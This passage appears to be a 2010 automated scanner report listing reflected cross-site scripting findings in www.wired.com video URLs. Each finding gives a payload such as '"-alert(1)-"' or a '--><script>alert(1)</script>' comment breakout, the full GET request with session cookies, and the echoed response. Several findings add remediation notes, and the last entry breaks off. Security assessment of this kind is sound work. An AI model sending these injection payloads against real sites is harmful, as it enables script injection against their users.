<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video83275--><script>alert(1)</script>e5a9bbeecef/latest-videos/latest/1815816633/laserguided-rocket-launchers/660659848001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d4e6"-alert(1)-"e33b8c1baf7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos1d4e6"-alert(1)-"e33b8c1baf7/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:42:54 GMT Date: Mon, 22 Nov 2010 00:38:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106776
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9dcb"><a>1f630dc75e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosd9dcb"><a>1f630dc75e0/latest/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:10 GMT Date: Mon, 22 Nov 2010 00:37:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106698
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosd9dcb"><a>1f630dc75e0 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d97"><a>f80f15bc3c8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestc9d97"><a>f80f15bc3c8/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:11 GMT Date: Mon, 22 Nov 2010 00:38:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestc9d97"><a>f80f15bc3c8"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94c99"-alert(1)-"457d603472f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest94c99"-alert(1)-"457d603472f/1815816633/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:09 GMT Date: Mon, 22 Nov 2010 00:39:09 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106776
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7996"-alert(1)-"f62a95a254e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633a7996"-alert(1)-"f62a95a254e/laserguided-rocket-launchers/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:44:08 GMT Date: Mon, 22 Nov 2010 00:39:21 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106684
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3825b"-alert(1)-"90b48e4dfef was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/laserguided-rocket-launchers3825b"-alert(1)-"90b48e4dfef/660659848001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:44:25 GMT Date: Mon, 22 Nov 2010 00:39:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73b55"-alert(1)-"8ee60d48302 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/laserguided-rocket-launchers/66065984800173b55"-alert(1)-"8ee60d48302 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:42 GMT Date: Mon, 22 Nov 2010 00:39:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106730
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bea3f"><a>ee19a8d381a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videobea3f"><a>ee19a8d381a/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29438 Vary: Accept-Encoding Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:46:45 GMT Date: Mon, 22 Nov 2010 00:41:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videobea3f"><a>ee19a8d381a ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ac914--><script>alert(1)</script>70f13a29eaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoac914--><script>alert(1)</script>70f13a29eaf/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29477 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:47:43 GMT Date: Mon, 22 Nov 2010 00:42:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoac914--><script>alert(1)</script>70f13a29eaf/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 113f6"-alert(1)-"9d712c2a0d2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos113f6"-alert(1)-"9d712c2a0d2/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:59 GMT Date: Mon, 22 Nov 2010 00:43:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96e1e"><a>d886052180 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos96e1e"><a>d886052180/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:47:22 GMT Date: Mon, 22 Nov 2010 00:42:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106772
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos96e1e"><a>d886052180 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e61f6"-alert(1)-"a4270526c2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/lateste61f6"-alert(1)-"a4270526c2e/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:17 GMT Date: Mon, 22 Nov 2010 00:45:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed243"><a>ec92b35d5e4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latested243"><a>ec92b35d5e4/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:14 GMT Date: Mon, 22 Nov 2010 00:44:14 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106784
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latested243"><a>ec92b35d5e4"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92ffd"-alert(1)-"273e389145b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/181581663392ffd"-alert(1)-"273e389145b/lockheed-shows-off-hulc-exoskeleton-at-asus/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=299 Expires: Mon, 22 Nov 2010 00:50:40 GMT Date: Mon, 22 Nov 2010 00:45:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21228"-alert(1)-"b482d416147 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus21228"-alert(1)-"b482d416147/652164127001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:50:56 GMT Date: Mon, 22 Nov 2010 00:45:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cc62"-alert(1)-"fa04636625 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/lockheed-shows-off-hulc-exoskeleton-at-asus/6521641270016cc62"-alert(1)-"fa04636625 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=288 Expires: Mon, 22 Nov 2010 00:51:04 GMT Date: Mon, 22 Nov 2010 00:46:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106759
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... ript type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 708ad"><a>a30d5c2b6ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video708ad"><a>a30d5c2b6ec/latest-videos/latest/1815816633/make-drones-almost-invincible/660704541001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
